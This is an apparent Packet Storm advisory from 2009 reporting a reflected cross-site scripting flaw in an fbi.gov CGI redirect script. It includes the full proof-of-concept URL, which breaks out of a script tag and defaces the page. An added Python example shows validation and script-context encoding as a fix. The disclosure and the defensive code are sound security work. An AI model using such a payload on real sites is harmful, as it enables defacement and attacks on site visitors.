FBI.gov Cross Site Scripting

2009-01-20T00:00:00
ID PACKETSTORM:74121
Type packetstorm
Reporter Matrix
Modified 2009-01-20T00:00:00

Description

by: Matrix (S.B)

OK, it is not the first time, but they had fixed them all. It will probably be the third or fourth time they try to address this damn CGI! Here is the XSS that Matrix submitted to SecurityFocus (works only in Internet Explorer):
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'Matrix(S.B)'</script>
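The following is an added defensive example, not code from the advisory or from the affected site. It assumes the CGI reflects the query-string URL into an inline script block, which the payload's leading `</script>` suggests but the page does not show. All function and constant names are hypothetical. It validates the target and then encodes it for the script context:

```python
import json
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# json.dumps leaves these raw, and the HTML parser acts on them before the
# JavaScript engine ever sees the string, so "</script>" would end the block.
HTML_SIGNIFICANT = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026"}

# Constructed sample input: the query string from the advisory's URL.
ADVISORY_QUERY = ("http://www.google.com/</script><script/defer>"
                  "document.body.innerHTML='xssed'+unescape('%20')+'by'"
                  "+unescape('%20')+'Matrix(S.B)'</script>")


def js_string_literal(value):
    """Encode value as a JS string literal that is safe in an inline script."""
    literal = json.dumps(value)  # handles quotes, backslashes, non-ASCII
    for raw, escaped in HTML_SIGNIFICANT.items():
        literal = literal.replace(raw, escaped)
    return literal


def validate_target(raw):
    """Return raw if it is an absolute http(s) URL free of markup characters."""
    # Deliberately strict: legitimate links percent-encode these characters.
    if any(c in "<>\"'`\\" or c.isspace() for c in raw):
        raise ValueError("forbidden character in target URL")
    parts = urlsplit(raw)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        raise ValueError("target must be an absolute http(s) URL")
    return raw


def render_interstitial(raw_query):
    """Hypothetical 'you are leaving this site' page for a query-string URL."""
    try:
        target = validate_target(raw_query)
    except ValueError:
        return "<p>Invalid link.</p>"
    return "<script>var target = %s;</script>" % js_string_literal(target)


if __name__ == "__main__":
    print(render_interstitial("http://www.google.com/"))
    print(render_interstitial(ADVISORY_QUERY))   # rejected by validation
    print(js_string_literal(ADVISORY_QUERY))     # encoding layer on its own
```

Validation and encoding are independent layers: the encoder alone already keeps the value inside the string literal, so a gap in the validator does not reopen the script breakout.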